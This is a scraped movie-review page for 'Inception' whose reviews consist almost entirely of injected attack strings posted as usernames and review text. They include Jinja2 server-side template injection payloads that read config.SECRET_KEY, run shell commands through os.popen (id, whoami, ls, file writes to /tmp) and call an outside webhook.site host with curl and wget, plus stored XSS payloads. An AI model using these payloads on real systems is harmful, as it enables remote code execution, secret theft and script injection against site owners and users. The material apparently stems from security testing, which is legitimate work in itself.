Inception
Download Poster
Synopsis
A skilled thief, the absolute best in the dangerous art of extraction, stealing valuable secrets from deep within the subconscious during the dream state.
Reviews
-
{{7*7}} (Jan 06, 2026 12:12 PM)
test
-
{{7*7}} (Jan 06, 2026 12:10 PM)
test
-
{{7*7}} (Jan 06, 2026 11:59 AM)
Final verification test
-
RatingTest (Jan 06, 2026 11:57 AM)
Testing rating parameter
-
ValidatorTest (Jan 06, 2026 11:57 AM)
{{13*37}}
-
{{7*191}} (Jan 06, 2026 11:57 AM)
Test review for username SSTI validation
-
TestUser (Jan 06, 2026 11:55 AM)
Test
-
TestUser (Jan 06, 2026 11:54 AM)
{{7*7}}
-
{{7*7}} (Jan 06, 2026 11:54 AM)
Test
-
TestUser (Jan 06, 2026 11:54 AM)
Test
-
TestUser (Jan 06, 2026 11:54 AM)
{{7*7}}
-
{{7*7}} (Jan 06, 2026 11:54 AM)
Test
-
TestUser (Jan 06, 2026 11:51 AM)
Test
-
TestUser (Jan 06, 2026 11:51 AM)
Test
-
TestUser (Jan 06, 2026 11:51 AM)
{{lipsum.__globals__['os'].popen('whoami').read()}}
-
TestUser (Jan 06, 2026 11:51 AM)
{{config.items()}}
-
TestUser (Jan 06, 2026 11:51 AM)
{{7*7}}
-
{{lipsum.__globals__['os'].popen('whoami').read()}} (Jan 06, 2026 11:51 AM)
Test
-
{{config}} (Jan 06, 2026 11:51 AM)
Test
-
{{7*7}} (Jan 06, 2026 11:51 AM)
Test
-
TestUser (Jan 06, 2026 11:49 AM)
Test content
-
TestUser (Jan 06, 2026 11:49 AM)
{{lipsum.__globals__['os'].popen('whoami').read()}}
-
TestUser (Jan 06, 2026 11:49 AM)
{{7*7}}
-
{{lipsum.__globals__['os'].popen('id').read()}} (Jan 06, 2026 11:49 AM)
Test content
-
{{7*7}} (Jan 06, 2026 11:49 AM)
Test content
-
TestUser_Rating (Jan 06, 2026 11:48 AM)
Test review content
-
TestUser_Rating (Jan 06, 2026 11:48 AM)
Test review content
-
TestUser_Rating (Jan 06, 2026 11:48 AM)
Test review content
-
TestUser_Content (Jan 06, 2026 11:48 AM)
{{lipsum.__globals__['os'].popen('pwd').read()}}
-
TestUser_Content (Jan 06, 2026 11:48 AM)
{{lipsum.__globals__['os'].popen('whoami').read()}}
-
TestUser_Content (Jan 06, 2026 11:48 AM)
{{lipsum.__globals__['os'].popen('id').read()}}
-
TestUser_Content (Jan 06, 2026 11:48 AM)
{{config.SECRET_KEY}}
-
TestUser_Content (Jan 06, 2026 11:48 AM)
{{config.items()}}
-
TestUser_Content (Jan 06, 2026 11:48 AM)
{{config}}
-
TestUser_Content (Jan 06, 2026 11:48 AM)
{{7*7}}
-
{{lipsum.__globals__['os'].popen('pwd').read()}} (Jan 06, 2026 11:48 AM)
Test review content
-
{{lipsum.__globals__['os'].popen('whoami').read()}} (Jan 06, 2026 11:48 AM)
Test review content
-
{{lipsum.__globals__['os'].popen('id').read()}} (Jan 06, 2026 11:48 AM)
Test review content
-
{{config.SECRET_KEY}} (Jan 06, 2026 11:48 AM)
Test review content
-
{{config.items()}} (Jan 06, 2026 11:48 AM)
Test review content
-
{{config}} (Jan 06, 2026 11:48 AM)
Test review content
-
{{7*7}} (Jan 06, 2026 11:48 AM)
Test review content
-
{{7*7}} (Jan 06, 2026 11:48 AM)
Test content
-
TestUser (Jan 01, 2026 02:33 PM)
{{lipsum.__globals__['os'].popen('id').read()}}
-
User_{{7*7}} (Jan 01, 2026 02:33 PM)
Test review content
-
TestUser (Jan 01, 2026 02:32 PM)
Test review
-
TestUser (Jan 01, 2026 02:32 PM)
{{7*7}}
-
{{7*7}} (Jan 01, 2026 02:32 PM)
Test review
-
TestUser_{{7*7}} (Jan 01, 2026 02:23 PM)
Test review {{config}}
-
User_{{lipsum.__globals__.os.popen("id").read()}} (Jan 01, 2026 02:16 PM)
Test
- anonymous (Jan 01, 2026 02:16 PM)
-
User_{{request}} (Jan 01, 2026 02:16 PM)
Test
-
User_{{config.items()}} (Jan 01, 2026 02:16 PM)
Test
-
User_{{config}} (Jan 01, 2026 02:16 PM)
Test
-
User_{{7*7}} (Jan 01, 2026 02:16 PM)
Test
-
TestUser_{{7*7}} (Jan 01, 2026 02:16 PM)
Great movie! {{config.items()}}
- TestUser {{7*7}} (Jan 01, 2026 02:15 PM)
-
ConfigTest_1767181295 (Dec 31, 2025 11:41 AM)
{{config.items()}}
-
User_1767181295 (Dec 31, 2025 11:41 AM)
Review content {{5*5}} marker_1767181295
-
SecondOrder_1767181295_{{7*7}} (Dec 31, 2025 11:41 AM)
Normal review content
-
ua_test_user (Dec 31, 2025 11:39 AM)
Testing if User-Agent is stored
-
header_test (Dec 31, 2025 11:37 AM)
Testing headers
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:37 AM)
hostname_1767181026
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:37 AM)
id_1767181024
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:37 AM)
FinalProof
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:37 AM)
RawHTML1767181021
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:37 AM)
Test1767181019
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:36 AM)
Test1767181017
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:36 AM)
Test1767181016
-
LongTest (Dec 31, 2025 11:35 AM)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-
hostname1767180929 (Dec 31, 2025 11:35 AM)
{{lipsum.__globals__.os.popen(request.args.cmd).read()}}
-
id1767180927 (Dec 31, 2025 11:35 AM)
{{lipsum.__globals__.os.popen(request.args.cmd).read()}}
-
whoami1767180925 (Dec 31, 2025 11:35 AM)
{{lipsum.__globals__.os.popen(request.args.cmd).read()}}
-
RCE1767180923 (Dec 31, 2025 11:35 AM)
{{lipsum.__globals__.os.popen(request.args.cmd).read()}}
-
Test (Dec 31, 2025 11:35 AM)
{{'SSTI_MARKER_1767180921'}}
-
AAAAAAAAAA (Dec 31, 2025 11:34 AM)
Length test
-
ContentRCETest (Dec 31, 2025 11:34 AM)
{{lipsum.__globals__.os.popen(request.args.cmd).read()}}
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:34 AM)
Debug test
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:34 AM)
hostname test
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:34 AM)
id test
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:34 AM)
whoami test
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:34 AM)
RCE verification
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:34 AM)
RCE verification
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:33 AM)
RCE verification
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:33 AM)
RCE verification
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:33 AM)
RCE verification
-
ContentRCE (Dec 31, 2025 11:33 AM)
{{lipsum.__globals__.os.popen(request.args.cmd).read()}}
-
ContentTest (Dec 31, 2025 11:33 AM)
{{7*'7'}}
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:33 AM)
RCE proof
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:33 AM)
RCE proof
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:33 AM)
RCE proof
-
TestUser (Dec 31, 2025 11:32 AM)
FINAL_TEST_{{13*17}}_CONTENT
-
FINAL_TEST_{{13*17}} (Dec 31, 2025 11:32 AM)
Final verification test
-
{{cycler.__init__.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{cycler.__init__.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{cycler.__init__.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{cycler.__init__.__globals__.__getitem__(request.args.x)}} (Dec 31, 2025 11:32 AM)
test
-
{{lipsum.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{lipsum.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{lipsum.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{lipsum.__globals__.__getitem__(request.args.x)}} (Dec 31, 2025 11:32 AM)
test
-
{{config.__class__.__init__.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{config.__class__.__init__.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{config.__class__.__init__.__globals__.__getitem__(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{config.__class__.__init__.__globals__.__getitem__(request.args.x)}} (Dec 31, 2025 11:32 AM)
test
-
{{lipsum.__globals__.get(request.args.x).popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{cycler.__init__.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{lipsum.__globals__.os.popen(request.args.cmd).read()}} (Dec 31, 2025 11:32 AM)
RCE
-
{{cycler.__init__.__globals__}} (Dec 31, 2025 11:32 AM)
RCE test
-
{{lipsum.__globals__}} (Dec 31, 2025 11:32 AM)
RCE test
-
{{request.application.__globals__}} (Dec 31, 2025 11:32 AM)
RCE test
-
{{config.items()}} (Dec 31, 2025 11:32 AM)
RCE test
-
{{config.__class__.__init__.__globals__}} (Dec 31, 2025 11:32 AM)
RCE test
-
UNIQUE_REVIEW_TEST_987654321 (Dec 31, 2025 11:31 AM)
This is a unique test review
-
{{7*7|safe}} (Dec 31, 2025 11:31 AM)
Test
-
{%print(7*7)%} (Dec 31, 2025 11:31 AM)
Test
-
{{''.__class__}} (Dec 31, 2025 11:31 AM)
Test
-
{{request}} (Dec 31, 2025 11:31 AM)
Test
-
{{config}} (Dec 31, 2025 11:31 AM)
Test
-
{{7*'7'}} (Dec 31, 2025 11:31 AM)
Test
-
{{7*7}} (Dec 31, 2025 11:31 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__.sys.modules.os.popen(request.args.c).read()}} (Dec 31, 2025 11:31 AM)
RCE test
-
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__.sys.modules.os.popen(request.args.c).read()}} (Dec 31, 2025 11:31 AM)
RCE test
-
{{config}} (Dec 31, 2025 11:31 AM)
Test
-
TestUser (Dec 31, 2025 11:30 AM)
{{7*7}}
-
{{7*7}}_reviewer_1767180656 (Dec 31, 2025 11:30 AM)
Test review
-
TestReviewer (Dec 31, 2025 11:30 AM)
Great movie!
-
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{7*7}} (Dec 31, 2025 11:30 AM)
Test review
-
RCE_START_{{config.__class__.__init__.__globals__['os'].popen('hostname').read()}}_RCE_END (Dec 31, 2025 11:30 AM)
Marker test
-
RCE_START_{{config.__class__.__init__.__globals__['os'].popen('id').read()}}_RCE_END (Dec 31, 2025 11:30 AM)
Marker test
-
RCE_START_{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}_RCE_END (Dec 31, 2025 11:30 AM)
Marker test
-
{{url_for.__globals__['os'].popen('hostname').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{url_for.__globals__['os'].popen('id').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{url_for.__globals__['os'].popen('whoami').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{lipsum.__globals__['os'].popen('hostname').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{lipsum.__globals__['os'].popen('id').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{lipsum.__globals__['os'].popen('whoami').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{config.__class__.__init__.__globals__['os'].popen('hostname').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{config.__class__.__init__.__globals__['os'].popen('id').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}} (Dec 31, 2025 11:30 AM)
RCE test
-
testuser (Dec 31, 2025 11:30 AM)
test content
-
TestUser (Dec 31, 2025 11:29 AM)
{{7*'7'}}
-
{{7*'7'}} (Dec 31, 2025 11:29 AM)
Test
-
TestUser (Dec 31, 2025 11:29 AM)
{{7*7}}
-
{{7*7}} (Dec 31, 2025 11:29 AM)
Test review
-
TestUser (Dec 31, 2025 11:29 AM)
Great movie!
-
TestUser (Dec 31, 2025 11:23 AM)
{{7*7}}
-
TestUser (Dec 31, 2025 11:23 AM)
This is a great movie!
-
{{7*7}} (Dec 31, 2025 11:23 AM)
Great movie!
-
TestUser (Dec 31, 2025 11:23 AM)
Great movie!
-
NormalUser (Dec 31, 2025 11:23 AM)
{{7*7}}
-
{{7*7}} (Dec 31, 2025 11:23 AM)
Test review
-
TestUser (Dec 31, 2025 11:23 AM)
Great movie!
-
user_config_items_1767180107 (Dec 31, 2025 11:21 AM)
{{config.items()}}
-
user_class_introspection_1767180105 (Dec 31, 2025 11:21 AM)
{{''.__class__.__mro__[1].__subclasses__()}}
-
user_config_access_1767180103 (Dec 31, 2025 11:21 AM)
{{config}}
-
user_basic_concat_1767180102 (Dec 31, 2025 11:21 AM)
{{7*'7'}}
-
user_basic_math_1767180100 (Dec 31, 2025 11:21 AM)
{{7*7}}
-
testuser (Dec 31, 2025 11:21 AM)
This is a normal review content for baseline testing
-
{{''.__class__.__mro__[1].__subclasses__()}} (Dec 31, 2025 11:20 AM)
review_class_introspection_1767180030
-
{{config}} (Dec 31, 2025 11:20 AM)
review_config_access_1767180028
-
{{7*'7'}} (Dec 31, 2025 11:20 AM)
review_basic_concat_1767180026
-
{{7*7}} (Dec 31, 2025 11:20 AM)
review_basic_math_1767180025
-
normaluser_baseline (Dec 31, 2025 11:20 AM)
This is a normal review
-
RCE_{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0]}}_END (Dec 31, 2025 11:20 AM)
Test
-
DEBUG_{{config.DEBUG}}_END (Dec 31, 2025 11:20 AM)
Test
-
SECRET_{{config.SECRET_KEY}}_END (Dec 31, 2025 11:20 AM)
Test
-
MARKER_{{7*7}}_END (Dec 31, 2025 11:20 AM)
Test
-
TEST_{{7*7}}_END (Dec 31, 2025 11:19 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('pwd',shell=True,stdout=-1).communicate()[0]}} (Dec 31, 2025 11:19 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True,stdout=-1).communicate()[0]}} (Dec 31, 2025 11:19 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0]}} (Dec 31, 2025 11:19 AM)
Test
-
KEYS:{{config.keys()|list}} (Dec 31, 2025 11:19 AM)
Test
-
DEBUG={{config.DEBUG}} (Dec 31, 2025 11:19 AM)
Test
-
{{config.SECRET_KEY}} (Dec 31, 2025 11:19 AM)
Test
-
{{namespace}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{joiner}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{cycler}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{lipsum}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{self}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{config.items()}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{''.__class__.__mro__[1].__subclasses__()}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{config}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{7*'7'}} (Dec 31, 2025 11:19 AM)
This is a test review
-
{{7*7}} (Dec 31, 2025 11:19 AM)
This is a test review
-
normaluser (Dec 31, 2025 11:19 AM)
This is a normal review
-
{{''.__init__.__globals__['__builtins__']['__import__']}} (Dec 31, 2025 11:19 AM)
Test
-
{{''.__init__.__globals__['__builtins__']}} (Dec 31, 2025 11:19 AM)
Test
-
{{''.__init__.__globals__}} (Dec 31, 2025 11:19 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()|length}} (Dec 31, 2025 11:19 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()}} (Dec 31, 2025 11:19 AM)
Test
-
{{''.__class__.__mro__}} (Dec 31, 2025 11:19 AM)
Test
-
{{os.environ}} (Dec 31, 2025 11:19 AM)
Test
-
{{environ.get('PATH')}} (Dec 31, 2025 11:19 AM)
Test
-
{{environ}} (Dec 31, 2025 11:19 AM)
Test
-
{{config.values()}} (Dec 31, 2025 11:19 AM)
Test
-
{{config.keys()}} (Dec 31, 2025 11:19 AM)
Test
-
{{config.items()}} (Dec 31, 2025 11:19 AM)
Test
-
{{config.SECRET_KEY}} (Dec 31, 2025 11:19 AM)
Test
-
{{config.DEBUG}} (Dec 31, 2025 11:19 AM)
Test
-
{{config}} (Dec 31, 2025 11:19 AM)
Test
-
{{request.path}} (Dec 31, 2025 11:18 AM)
Test
-
{{request.method}} (Dec 31, 2025 11:18 AM)
Test
-
{{request}} (Dec 31, 2025 11:18 AM)
Test
-
{{self.__dict__}} (Dec 31, 2025 11:18 AM)
Test
-
{{self.__class__}} (Dec 31, 2025 11:18 AM)
Test
-
{{self.__module__}} (Dec 31, 2025 11:18 AM)
Test
-
{{self}} (Dec 31, 2025 11:18 AM)
Test
-
{{"hello"|replace('h','H')}} (Dec 31, 2025 11:18 AM)
Test
-
{{"TEST"|lower}} (Dec 31, 2025 11:18 AM)
Test
-
{{"test"|upper}} (Dec 31, 2025 11:18 AM)
Test
-
{{"test"|length}} (Dec 31, 2025 11:18 AM)
Test
-
{{"hello" + "world"}} (Dec 31, 2025 11:18 AM)
Test
-
#set($x = 7*7)$x (Dec 31, 2025 11:18 AM)
Test
-
{$7*7} (Dec 31, 2025 11:18 AM)
Test
-
<%= 7*7 %> (Dec 31, 2025 11:18 AM)
Test
-
{{7|int * 7}} (Dec 31, 2025 11:18 AM)
Test
-
{% set x = 7*7 %}{{x}} (Dec 31, 2025 11:18 AM)
Test
-
{% for i in range(1) %}49{% endfor %} (Dec 31, 2025 11:18 AM)
Test
-
{% if 7*7 %}49{% endif %} (Dec 31, 2025 11:18 AM)
Test
-
{{7*7}} (Dec 31, 2025 11:18 AM)
Test
-
{{7*7}} (Dec 31, 2025 11:18 AM)
Test
-
MARKER_START (Dec 31, 2025 11:18 AM)
Test
-
{{dict(a=1)}} (Dec 31, 2025 11:18 AM)
Test
-
{{range(5)}} (Dec 31, 2025 11:18 AM)
Test
-
{{namespace}} (Dec 31, 2025 11:18 AM)
Test
-
{{joiner}} (Dec 31, 2025 11:18 AM)
Test
-
{{cycler}} (Dec 31, 2025 11:17 AM)
Test
-
{{lipsum}} (Dec 31, 2025 11:17 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('python -c "import requests; requests.get(\'" + WEBHOOK_URL + "\')"',shell=True,stdout=-1).communicate()}} (Dec 31, 2025 11:17 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('wget https://webhook.site/525a3c81-e6ec-4067-8e1a-a1c2469aba67',shell=True,stdout=-1).communicate()}} (Dec 31, 2025 11:17 AM)
Test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('curl https://webhook.site/525a3c81-e6ec-4067-8e1a-a1c2469aba67',shell=True,stdout=-1).communicate()}} (Dec 31, 2025 11:17 AM)
Test
-
{{config}} (Dec 31, 2025 11:16 AM)
Great movie
-
{{lipsum}} (Dec 31, 2025 11:16 AM)
Great movie
-
{{''.__class__.__mro__[1].__subclasses__()[404]('id',shell=True,stdout=-1).communicate()}} (Dec 31, 2025 11:16 AM)
Great movie
-
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()}} (Dec 31, 2025 11:16 AM)
Great movie
-
{{7*7}} (Dec 31, 2025 11:16 AM)
Great movie
-
testuser (Dec 31, 2025 11:16 AM)
Great movie
- testuser (Dec 31, 2025 11:15 AM)
- testuser (Dec 31, 2025 11:15 AM)
- xsstest_9859 (Dec 31, 2025 11:15 AM)
- xsstest_8633 (Dec 31, 2025 11:14 AM)
-
xsstest_7501 (Dec 31, 2025 11:14 AM)
- xsstest_8837 (Dec 31, 2025 11:14 AM)
-
testuser (Dec 31, 2025 11:14 AM)
{{cycler}}
-
testuser (Dec 31, 2025 11:14 AM)
{{request}}
-
testuser (Dec 31, 2025 11:14 AM)
{{lipsum}}
-
testuser (Dec 31, 2025 11:14 AM)
{{''.__class__.__mro__[1].__subclasses__()[404]('id',shell=True,stdout=-1).communicate()}}
-
testuser (Dec 31, 2025 11:14 AM)
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()}}
-
testuser (Dec 31, 2025 11:14 AM)
{{''.__class__.__mro__[1].__subclasses__()}}
-
testuser (Dec 31, 2025 11:14 AM)
{{config.items()}}
-
testuser (Dec 31, 2025 11:14 AM)
{{config}}
-
testuser (Dec 31, 2025 11:14 AM)
{{7*7}}
-
testuser (Dec 31, 2025 11:14 AM)
Great movie
-
{{cycler}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{request}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{lipsum}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{''.__class__.__mro__[1].__subclasses__()[404]('id',shell=True,stdout=-1).communicate()}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{''.__class__.__mro__[1].__subclasses__()}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{config.items()}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{config}} (Dec 31, 2025 11:14 AM)
Great movie
-
{{7*7}} (Dec 31, 2025 11:14 AM)
Great movie
-
testuser (Dec 31, 2025 11:14 AM)
Great movie
- <img src=x onerror=alert('STORED_XSS_USERNAME')> (Dec 31, 2025 11:13 AM)
- testuser_review (Dec 31, 2025 11:13 AM)
- testuser (Dec 31, 2025 11:13 AM)
- <img src=x onerror=alert('XSS')> (Dec 31, 2025 11:13 AM)
-
VALTEST_CONFIG_1767179284 (Dec 31, 2025 11:08 AM)
{{config}}
-
VALTEST_BLOCK_1767179282 (Dec 31, 2025 11:08 AM)
{% if 7*191 %}Result:1337{% endif %}
-
{{config}} (Dec 31, 2025 11:07 AM)
Test
-
{{"hello"+"world"}} (Dec 31, 2025 11:07 AM)
Test
-
{{7*7}} (Dec 31, 2025 11:07 AM)
Test
-
VALTEST_1767179248 (Dec 31, 2025 11:07 AM)
{{7*191}}
- "><img src=x onerror=alert('XSS')> (Dec 31, 2025 11:06 AM)
- '"><script>alert('XSS')</script> (Dec 31, 2025 11:06 AM)
- <details open ontoggle=alert('XSS')> (Dec 31, 2025 11:06 AM)
- <marquee onstart=alert('XSS')> (Dec 31, 2025 11:06 AM)
- <input onfocus=alert('XSS') autofocus> (Dec 31, 2025 11:06 AM)
- <body onload=alert('XSS')> (Dec 31, 2025 11:06 AM)
- <iframe src=javascript:alert('XSS')> (Dec 31, 2025 11:06 AM)
- <svg onload=alert('XSS')> (Dec 31, 2025 11:06 AM)
- <img src=x onerror=alert('XSS')> (Dec 31, 2025 11:06 AM)
- <script>alert('XSS')</script> (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
- testuser (Dec 31, 2025 11:06 AM)
-
FINAL_RCE_3 (Dec 31, 2025 11:05 AM)
FINAL_RCE_3: {% for x in [request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('pwd')|attr('read')()] %}PWD:{{x}}:END{% endfor %}
-
FINAL_TEST_2 (Dec 31, 2025 11:05 AM)
FINAL_TEST_2: {% for x in [config.SECRET_KEY] %}SECRET:{{x}}:END{% endfor %}
-
FINAL_TEST_1 (Dec 31, 2025 11:05 AM)
FINAL_TEST_1: {% for x in ['TESTVALUE'] %}{{x}}{% endfor %}
-
FINAL_RCE_2 (Dec 31, 2025 11:05 AM)
FINAL_RCE_2: {% for x in [lipsum|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('whoami')|attr('read')()] %}OUT:{{x}}:END{% endfor %}
-
FINAL_RCE_1 (Dec 31, 2025 11:05 AM)
FINAL_RCE_1: {% for x in [lipsum.__globals__['__builtins__']['__import__']('os').popen('id').read()] %}OUTPUT:{{x}}:END{% endfor %}
-
{% set x = lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read() %}{% if x %}RCE{% endif %} (Dec 31, 2025 11:04 AM)
Testing RCE in username field
-
{% if config %}HASCONFIG{% endif %} (Dec 31, 2025 11:04 AM)
Testing config access in username
-
{% if 7*7 %}49{% endif %} (Dec 31, 2025 11:04 AM)
Testing username SSTI with statements
-
{{7*7}} (Dec 31, 2025 11:04 AM)
Testing username SSTI with expressions
-
RCE_ID_TEST (Dec 31, 2025 11:04 AM)
{% set x = lipsum.__globals__.__builtins__.__import__('os').popen('id').read() %}RESULT: {{x}}
-
RCE_TEST (Dec 31, 2025 11:03 AM)
{% set x = lipsum.__globals__.__builtins__.__import__('os').popen('whoami > /tmp/ssti_test_' + str(__import__('time').time())).read() %}
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
-
ALT_WRITE_2 (Dec 31, 2025 11:03 AM)
ALT_WRITE_2: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('whoami > rce_test.txt').read() %}{% if 1 %}WRITTEN{% endif %}
-
ALT_WRITE_1 (Dec 31, 2025 11:03 AM)
ALT_WRITE_1: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('whoami > /app/static/rce_proof.txt').read() %}{% if 1 %}WRITTEN{% endif %}
-
SSTI_TEST_MARKER_1767179013 (Dec 31, 2025 11:03 AM)
TEST_CONTENT_MARKER
-
WRITE_LS (Dec 31, 2025 11:03 AM)
WRITE_LS: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('ls -la > /tmp/ls.txt').read() %}{% if 1 %}FILE_WRITTEN{% endif %}
-
WRITE_PWD (Dec 31, 2025 11:03 AM)
WRITE_PWD: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('pwd > /tmp/pwd.txt').read() %}{% if 1 %}FILE_WRITTEN{% endif %}
-
WRITE_ID (Dec 31, 2025 11:03 AM)
WRITE_ID: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('id > /tmp/id.txt').read() %}{% if 1 %}FILE_WRITTEN{% endif %}
-
WRITE_WHOAMI (Dec 31, 2025 11:03 AM)
WRITE_WHOAMI: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('whoami > /tmp/whoami.txt').read() %}{% if 1 %}FILE_WRITTEN{% endif %}
-
{{ 'a' + 'b' }} (Dec 31, 2025 11:03 AM)
test
-
{{ 7 * 7 }} (Dec 31, 2025 11:03 AM)
test
-
